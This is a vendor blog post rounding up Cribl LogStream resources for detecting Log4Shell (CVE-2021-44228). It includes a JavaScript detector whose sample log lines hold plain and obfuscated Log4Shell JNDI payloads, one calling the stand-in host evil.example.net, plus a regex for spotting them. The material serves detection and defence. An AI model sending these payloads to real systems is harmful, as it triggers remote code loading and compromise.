Detecting and Preventing Log4J Attacks with Cribl LogStream

Written by Nick Heudecker

January 5, 2022

Shortly before the December holidays, a vulnerability in the ubiquitous Log4J library (CVE-2021-44228, better known as Log4Shell) arrived like the Grinch, Scrooge, and Krampus rolled into one monstrous bundle of Christmas misery. Log4J maintainers went to work patching the vulnerability, and security teams scrambled to protect millions of exposed applications before they got owned. At Cribl, we put together multiple resources to help security teams detect and respond to Log4J attacks using LogStream. Here is everything in one place:

Blog Post: Catching Malicious Log4j/Log4Shell Events In Real Time with LogStream

This blog from Igor Gifrin breaks down the exploit, then shows how you can use LogStream to identify events carrying Log4J exploit attempts and route them to a separate destination for investigation and remediation.

Live Stream: Using LogStream to Help with #Log4Shell Detection, Enrichment, and Incident Response

Ed Bailey and I did a live stream where we went deeper into LogStream’s features, showing not only how to detect Log4J attacks but also how to enrich inbound data with GeoIP information and how to use LogStream’s lookup capabilities to quickly update a list of compromised hosts or indicators of compromise (IOCs).
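The detection-and-enrichment idea that the blog post and the live stream above describe, as an added example that is not code from either resource or from Cribl: plain JavaScript rather than a LogStream pipeline, so it runs stand-alone. It normalizes the two nested-lookup tricks attackers most often used to hide the `${jndi:` string, extracts the callback host, checks it against an IOC table, and tags the event with the route a pipeline would give it. The access-log lines, the callback hosts and the IOC table are constructed for the example; `deobfuscate`, `detectLog4Shell`, `enrichEvent` and `classifyAll` are names chosen here.

```javascript
// Added example, not Cribl's code: detection logic a LogStream Eval/Regex
// function would express, written as plain JavaScript so it runs stand-alone.
// Sample log lines, hostnames and the IOC list below are all constructed.

// Attackers hid "${jndi:" behind nested Log4J lookups. Each pass below
// resolves one layer of the two tricks seen most often; loop until stable.
function deobfuscate(s) {
  let prev;
  do {
    prev = s;
    // ${lower:x} / ${upper:x}  ->  x
    s = s.replace(/\$\{(?:lower|upper):([^}$]*)\}/gi, '$1');
    // ${::-x} and ${env:MISSING:-x} (default-value syntax)  ->  x
    s = s.replace(/\$\{[^}$]*:-([^}$]*)\}/g, '$1');
  } while (s !== prev);
  return s;
}

// JNDI lookup with one of the URL schemes the Log4Shell payloads used;
// captures the callback host so it can be checked against IOCs.
const JNDI_RE = /\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:\/\/\s*([^\/:}\s]+)/i;

function detectLog4Shell(raw) {
  const m = JNDI_RE.exec(deobfuscate(raw));
  return m ? { scheme: m[1].toLowerCase(), host: m[2] } : null;
}

// Constructed IOC table standing in for a lookup file of known callback hosts.
const IOC_HOSTS = new Set(['203.0.113.10']);

// Mirror the pipeline decision: tag the event and pick its route.
function enrichEvent(raw) {
  const hit = detectLog4Shell(raw);
  const event = { _raw: raw, log4shell: hit !== null };
  if (hit) {
    event.log4shell_scheme = hit.scheme;
    event.log4shell_host = hit.host;
    event.ioc_match = IOC_HOSTS.has(hit.host);
  }
  event.route = hit ? 'log4shell_investigation' : 'default';
  return event;
}

// Constructed sample events: one benign request, one plain payload and
// two obfuscated payloads in the User-Agent position of an access log.
const SAMPLE_LINES = [
  '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
  '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10:1389/x}"',
  '198.51.100.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://evil.example.net:1099/o}"',
];

function classifyAll(lines) {
  return lines.map(enrichEvent);
}

for (const e of classifyAll(SAMPLE_LINES)) {
  console.log(`${e.route.padEnd(24)} ioc=${e.ioc_match === true} host=${e.log4shell_host || '-'}`);
}
```

Two caveats a practitioner should keep in mind. The normalization above covers only the `${lower:}`/`${upper:}` and default-value (`:-`) tricks; Log4J's lookup grammar has more (`${env:}`, `${sys:}`, `${date:}`), so a production rule should treat any event that still contains `${` with `jndi` after normalization as suspicious rather than relying on an exact match. And the payload is not confined to the User-Agent: any header, parameter or field that ends up in a Log4J log call is a carrier, so the check belongs on the whole raw event, not one extracted field.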

Solution Brief: What is the Log4J Vulnerability?

Since IT executives are busy, we also put together a one-page solution brief describing the vulnerability and how LogStream’s unique features help security teams respond to the threat.

Video: Detecting Log4J/Log4Shell exploits with LogStream

Lastly, we did a quick video summarizing the exploit, the scope of the threat, and where Cribl LogStream fits in.

If you’re working on the Log4J vulnerability and need a hand with LogStream in your environment, please drop into the Cribl Community Slack. We’re here to help. If you need LogStream, it’s available for free either in the cloud or as software, and our sandboxes offer a great way to try the product with sample data.

Questions about our technology? We’d love to chat with you.